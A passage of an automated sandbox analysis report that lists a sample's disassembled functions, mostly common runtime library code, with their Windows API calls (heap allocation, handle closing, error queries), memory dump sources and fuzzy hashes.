                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
                                                                                                                                                                                                                                  • Instruction ID: 06246c53192d8cfbd3d41323b99829aa44737f13750c69a9e30d60c6d8ad7dc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8951C361A0D2C246E634AF369410ABBA291EF44BA8F944635DDED477D5EE3CEC208720
                                                                                                                                                                                                                                  Function 00007FF79DAEB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                  • Instruction ID: 64b93622451faab0d04ea36109b119492eb3a97bc0fdbdefb1961bdd1150d384
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7611C46171CA8181DA20AB39A408569A761EB49BF4F944331EEBD077E9EE7CD860C710
                                                                                                                                                                                                                                  Function 00007FF79DAE9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF79DAF2032,?,?,?,00007FF79DAF206F,?,?,00000000,00007FF79DAF2535,?,?,?,00007FF79DAF2467), ref: 00007FF79DAE9C6E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF79DAF2032,?,?,?,00007FF79DAF206F,?,?,00000000,00007FF79DAF2535,?,?,?,00007FF79DAF2467), ref: 00007FF79DAE9C78
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                  • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                  • Instruction ID: 92c5b64df51db628a8f7cd6e613a01c67b57acca572e114324e23ab4703de6b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE04610F0C64682FB38BBB6A8458B992A1DF9C700B804030C98D83262FE6CAC658230
                                                                                                                                                                                                                                  Function 00007FF79DAE9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF79DAE9CE5,?,?,00000000,00007FF79DAE9D9A), ref: 00007FF79DAE9ED6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF79DAE9CE5,?,?,00000000,00007FF79DAE9D9A), ref: 00007FF79DAE9EE0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                  • Instruction ID: 95801a3717096a57f07b8858274ce5d1e79c012064b1daa08e09db7ddf34aab2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8219511B1C78241EA70BB76A4447BD9291DF88790F884635EAAD472D1EE6CAD60C331
                                                                                                                                                                                                                                  Function 00007FF79DAEB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                  • Instruction ID: 68cdc4754c8a2c646ac290080521ae48ed3c37d9298781163e82220f2f332386
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C41913290C24287EA34AF35E55597DB3A0EF59B90F940131D6DA836D1EF2CE912C772
                                                                                                                                                                                                                                  Function 00007FF79DAD76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                  • Opcode ID: f9e300d27ed469fbcb6f93ed44fdcb2b54c6f72a45599014825c29f043835573
                                                                                                                                                                                                                                  • Instruction ID: 844c00d5763dafdb38c4eadba1d49d733e613af1c4382b3336b315b8b97bcf92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9e300d27ed469fbcb6f93ed44fdcb2b54c6f72a45599014825c29f043835573
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14218115B0C25145FA24AB266914BBAE641FF45BD4FC84830DD8D07782EFBDE951C720
                                                                                                                                                                                                                                  Function 00007FF79DAEAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                                                                                                                                                                  • Instruction ID: 56018aad65569fca74005ad8809961b665a58c3d883e75ed1bc7140e7da0c2a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A31A422A1C64686F731BB769441BBDA650EB98B61F810135D99E133D2EFBCEC61C331
                                                                                                                                                                                                                                  Function 00007FF79DAE8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                  • Instruction ID: bb239a82ac6116746f7ba0fac9ef6185655c51e57330784469f461ce3d20c21d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B921A332A2A70589EB24AF74D4406FC73A0FB88728F840636D69C06AC5EF3CD964C760
                                                                                                                                                                                                                                  Function 00007FF79DAE52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                  • Instruction ID: 766c21dbaf9af2c70477ec0e58020ef6255408bf69f7918eab1502e850e0badf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D114221A1D64641EA70BF61E80097EE3A4EFA9B80F844431EACC57696EF7CDC60C771
                                                                                                                                                                                                                                  Function 00007FF79DAF5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                  • Instruction ID: 1f10228be7f7e3a1b8eeb46c0c40f170e5eda80e059c09468b09c07bb34963db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F521D632A0CA4186DB709F2CE8417B9B260EB94B94F980235D6DD476D5EF3CD810CB10
                                                                                                                                                                                                                                  Function 00007FF79DADF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                  • Instruction ID: 5cfd99e07bedefe45756257da4408ce8ccb51031db2d8271bdce7066a2716431
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2601A921A0C78241E924BF7659018AAE695FB55FE0F884531DEAC53BD6EF3CE8218310
                                                                                                                                                                                                                                  Function 00007FF79DAE720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                  • Instruction ID: d445253f930b0db2f7f94e99ebae84d79780cedc7ea1b58f7463010dc7e17855
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4015B24E0D68341FEB4BB76A546A799290EF497D4F940134F9DC426C6FE3CAC61C232
                                                                                                                                                                                                                                  Function 00007FF79DAE7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                  • Instruction ID: e506f19622be52db9c145e31ffac65919d7dd16cc1ff7404f2d7b1e8641e9314
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66E0EC94E0C74742FA347BB94986AB99114DF6C340FC44030D988462D3FD1CBC65D671
                                                                                                                                                                                                                                  Function 00007FF79DAEDEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF79DAEA63A,?,?,?,00007FF79DAE43FD,?,?,?,?,00007FF79DAE979A), ref: 00007FF79DAEDEFD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                  • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                  • Instruction ID: 3f44289b746d7ed727a5a6049e055170dae44382b56739262a4b81eed0a0c2d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6F04F04B0E24780FE74B7765825AB9D290DF5CB40FC84430C98E862D2FD6CEC61C230
                                                                                                                                                                                                                                  Function 00007FF79DAEC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF79DADFFB0,?,?,?,00007FF79DAE161A,?,?,?,?,?,00007FF79DAE2E09), ref: 00007FF79DAEC94A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
